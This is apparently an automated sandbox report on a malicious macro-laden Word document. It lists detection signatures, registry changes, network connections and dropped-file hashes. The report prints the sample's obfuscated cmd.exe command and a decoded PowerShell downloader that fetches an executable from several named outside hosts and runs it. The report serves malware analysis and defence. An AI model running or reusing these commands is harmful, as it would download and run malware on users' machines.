Malware Analysis Report

2024-10-16 06:27

Sample ID 240529-byme7ada3z
Target 7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118
SHA256 3cd982a08fa42bd51573f73b5eb53336e9fef97964b4eb9491153125266e9919
Tags: macro, macro_on_action
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256

3cd982a08fa42bd51573f73b5eb53336e9fef97964b4eb9491153125266e9919

Threat Level: Known bad

The file 7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

Tags: macro, macro_on_action

Process spawned unexpected child process

Blocklisted process makes network request

Office macro that triggers on suspicious action

Suspicious Office macro

An obfuscated cmd.exe command-line is typically used to evade detection.

Drops file in Windows directory

Office loads VBA resources, possible macro or embedded object present

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Checks processor information in registry

Enumerates system info in registry

Suspicious behavior: AddClipboardFormatListener

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-29 01:33

Signatures

Office macro that triggers on suspicious action

Tags: macro, macro_on_action
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Suspicious Office macro

Tags: macro
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-29 01:33

Reported

2024-05-29 01:35

Platform

win10v2004-20240508-en

Max time kernel

137s

Max time network

135s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118.doc" /o ""

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

An obfuscated cmd.exe command-line is typically used to evade detection.

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118.doc" /o ""

C:\Windows\SYSTEM32\cmd.exe

cmd /V/C"^s^e^t ^f^i=^Y^95^ ^s^:^&^ ^S^dc^ V^6v^ ^x^Q(^ ^2^>^`^ r^F^] ^w^f^Q^ g^t^Z^ ^h^Z^Y^ ^A^K^u^ ^{(^F^ ^x^*^7^ N^,^q^ ^j#^G^ ^j^Zr^ ^H^.^ ^Xk^p^}^$^\R^}^;^g^u^{^-q^{h^i^+^yc^A^7^?^t^T^K^2^a^B^O)c^[^l^X^}^A^5n^;^QN^A^k^\^`^Z^a^>(^K^e^#^0/rDr^K^b^6^?^>^;^+^A^Jc^:^H^Bz)^*%^q^*^O^?^$)^a^~^ E^sy^m^*^&^b^e^T^As^t^6^d^K^I^&^K^H^-^&^Q^e^e^t^}^h^k^T^y^b^o^acvv^[R^`n^m^+^d^I^B^D7^;^U^{^7)^j^*^>c^=^0^_^z^Y^3%^q%^l^}^$^P^D^I^ ^,^L^@^,c^'^D^j^+C^f^dA(^7^f^X^F^|$^k^]E(^f^BR^e^Qn^H^l^w^0^K^i^8^*^I^F^7^ ^`^d^>^i^6^a^M^F^P^o^T^k^q^lk^7^Sn^h^]^L^w^EV^X^o^&^=^m^D^}^K^g^.^:l^|n^E^a^eb^.^J^>E^D^P^e^$^J^?v^{^gF^e^yn^`^Or^A^W^*^tx^G^g^{^G^o^<)^&N^7^G^ ^9^D^K^3^b^p^t^6^3^s^$^k^@^, ^\^Q^4n^?^]^T^iN^W^2^ ^k^Q^&j^F^W^a^d^q^L^w^fC^7^_^$}^_^G(,^k^5^h^ADEc^5/^ ^a^ZV^>^e^m^[^<r^-^d^{^o^~^?^W^f^s^`(^;P^OF'%^27^e^s^\^P^x^4^+^1e^6^}x^.^p^6^\^'^?^}^u^+^p^F^l^M^Xng^K^\^Z^E^I'^=^Q$^b^D^h^+^qV^~^'^A^7^ ^\r^9^p^'^+2v^+^GV^acZ^.^W^i^s^8^]^l^X^{^:b^A^k^,^uC^[^_^p^h^.^I^:^81^Ov^w^4^3n^p^j^z^es^~^I^$^PcV^=^W^B^jcn%^W^z(^w,^q^w^Y^9^$^ur^{^;^ZIp'^O^_c^4^q^g^J3^+^:^m^1^>^5^{^'X^H^Q^ ^q^X^B^=^S^]^f^ ^KV^u^Mr^8^x^K^j^0^Q^I^4^{^1$^=^|(^;^m^8r)^]^TW^'^A^y^w^@^q^h^0^'^q^8)(F^i^p^t^HC^z^i^*^@m^l^z/^}^p^0^*^dS^_^s^~^.^<^>^*^'^|^D^:^q^KC^=^Fv^#}^M^P^K^FH^P^\^@^oh^6^w^a^+^=^q^d^X^pc^w^5^s)^8^ ^u^S/^\^9^0^m^5nC^o^w%^gcVM^+^.^O^>^t^t^m^F1^eu^]^j^i^z^6^yv,^P)n^Z^M^x^aSJ^m^s^l^t^x^m^br^q^a^Iz^M^l^o^'(/^Zl^q/K^MW^:,^0^_^p^?^Z^ut^Z^D^Bt^g^o^{^h^~^|^8^@r^$^>^O^k^f^jI^w^L^F^4^H^Q^bCn^h^Q^3^m^'^PN^k^8^Z^K_^D^d/^z^H^I^oN^i^T^f^t^H^mnc^q^\^i^}^ g^.^AE^#h^X^y^pk^a^i^E^i^\^D^I^e^l^#^<^h^]^e^T^sU^Q^J^h^.^L^8^a^-^@^]^l^?/vl^=^P^,^ur^;^T^d^}^d^T^b^G5^b^aVv*/^=^E^./^d^]^ 
^:2^W^M^p^]^s^J^t^_^'^b^t^.^s^p^h^,%^0^@^?n^>^J^s^;^g^b^3^F^4^p^z^w/v^#^;^1J^{^\^8^x^,CV^l^T-^=^d^X^]^d^w^\^K^H/^q^[^5^e^i^}^,^d^&^m^@^.^~n^>^d^z^.Nn^X%^ha^>aC^t^h^}:^s^KV^u^o^W^&^lt/^:r^o^{v^-^h^|^@^7^p^u^>^E^.^B(^T^w^Y^b^P^w^]5I^w^1^Pn/^`^Z^8/^{^X^i^:r^e^f^p^F^]^#^tn7N^t^P^pC^h^sk^x@^Z^=^6^I^Q^b^O^3^l^q^*N^O^8^\^K^4?^0^a^l^3^.^6^A^5/^x^\^o^5^7^+^X^h^h^.^B^*/^d4^<o^t^O^;r^])^F^.H^P^ie^I^s^:^u^x^H^E^q^|^K^A^i^Y/^E^f^[^>V^i^J^F^on^O^{^Y^i^2^9^S^a^M^u^`r^?^8^p^t^w^?^q^.{^P^A^wd^#r^w^u^}^$^w^W^s^o/^m^`^u/^e^1^{^:^L^pr^p^&^FY^t^Y^@^k^t^D^0^?h^9^]8^@@^5^sv^;^5^E^d^Y^U^|^P^WN^2^U^q^h^4^uC^=^?^O^`^wN^p^\^I^.^3h^A^G^1^K^S^H/^L^F^'^e^#^[^*^iR(^|^pR^Jr^t ^M^U^o^*^,^f^s^*^i^&/^>^a^-r^+%^Y^u^2^1^Qvv^x^2n^.6r^i^I^k^b^o^2^'^t^yc^U^4^t^2^m^J/^*^x^[^m^#^7^ ^o^*N^tc^s^}^m^.^I^EN^a^9^O^M^y^&N^tn^B^-^6^e^O^D^e^k^{^-C^s^.^M^p^d%bcn^Z^?^L^u^M^`^2^f^[^_^ar^J^?^}^i^|^qc^a^5^H^]^f^ R^B^.P^\a^w^D^GI^w^U%^u^w^{^_^}/^{^h^S/V^>^:^:^0^9^h^p^*^I^7^t+^G^~^t^y(^]^h^T^>^*^'^KV^9^=f^z{G^a^9^1^K^7^z*^ty^_^f^$i^A)^;^{^:^h^t~^\^`n^yv^Q^e^ ^j^d^i^Pc^?^lT^U^hC^F^A^4^b^K^@^\^e^Z^g^A^WcC^Q^.(^+^L^t^{^DW^e^[^5^mN)^g^f^ ^4i^Qt^[^\^*c^8^h^:^e^p^sV^j^}c^A^b^.^6ro^[^,^a^-~^h^]^wf^P^~^e^]^K^wnzR^Z=^X^}nn^l^3^s^b^wC^=^E^o^O^@^$^g^{^*^ ^j^b^wlC^|^4^l^,^z^A^e^1^_Qh^6^;^d^s^+)^hr{I^e^e^Xx^b^wN^]^xo^o^+^q^p&&^f^or /^L %^h ^in (^1^6^1^5^,^-^4^,^3)^d^o ^s^e^t ^F^0^Y^g=!^F^0^Y^g!!^f^i:~%^h,1!&&^i^f %^h=^=^3 c^a^l^l %^F^0^Y^g:^~^6%"###

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell $Ebn=new-object Net.WebClient;$tKG='http://www.fairfundskenya.com/tyoinvur/sotpie/13pOuUPdv@http://www.trainifique.ro/h7x6aKN3I@http://www.photostand.de/wdlxJvpbJ@http://abdullahsheikh.info/KN3C4IO@http://lamsanviet.com/8wdaoHMFq'.Split('@');$IKM = '134';$qzc=$env:public+'\'+$IKM+'.exe';foreach($fdj in $tKG){try{$Ebn.DownloadFile($fdj, $qzc);Invoke-Item $qzc;break;}catch{}} ###

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 www.fairfundskenya.com udp
US 8.8.8.8:53 www.trainifique.ro udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 185.199.109.153:80 www.trainifique.ro tcp
US 8.8.8.8:53 trainifique.ro udp
US 185.199.111.153:443 trainifique.ro tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 www.photostand.de udp
DE 81.169.145.165:80 www.photostand.de tcp
DE 81.169.145.165:443 www.photostand.de tcp
US 8.8.8.8:53 abdullahsheikh.info udp
US 8.8.8.8:53 lamsanviet.com udp
IN 193.203.163.237:80 lamsanviet.com tcp
IN 193.203.163.237:443 lamsanviet.com tcp
US 8.8.8.8:53 153.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 153.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 165.145.169.81.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.163.203.193.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 210.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
NL 23.62.61.162:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 162.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 23.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/3492-2-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-3-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-4-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-1-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-0-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-5-0x00007FFC162CD000-0x00007FFC162CE000-memory.dmp

memory/3492-6-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-7-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-8-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-9-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-11-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-12-0x00007FFBD3FE0000-0x00007FFBD3FF0000-memory.dmp

memory/3492-10-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-13-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-14-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-15-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-16-0x00007FFBD3FE0000-0x00007FFBD3FF0000-memory.dmp

memory/3492-17-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-36-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-37-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-38-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/1216-42-0x000002BE4DE10000-0x000002BE4DE32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_udcmrd5m.2di.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Public\134.exe

MD5 536033862cf0a0ae7b85c1edd0d9c4a7
SHA1 19ca4a149ee98f366541db126cefcd15738cd1eb
SHA256 9c545472b33561bd18c5dfedbb5c9944a1bd90cb8f4edbdee2a5d75e773b9f36
SHA512 d53d92c563d4f8aba1578f1e52abdda70aec2506bf18439e653e360c285fc01eacc8fadb85b615b38635d9c8f569bb04960084e75e0f2df749059fe43ea32b44

C:\Users\Admin\AppData\Local\Temp\TCD81A1.tmp\sist02.xsl

MD5 f883b260a8d67082ea895c14bf56dd56
SHA1 7954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256 ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512 d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

memory/3492-536-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-546-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-547-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-548-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-568-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-569-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-571-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-570-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-572-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-29 01:33

Reported

2024-05-29 01:35

Platform

win7-20240221-en

Max time kernel

122s

Max time network

123s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118.doc"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

An obfuscated cmd.exe command-line is typically used to evade detection.

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings

Tags: adware, spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
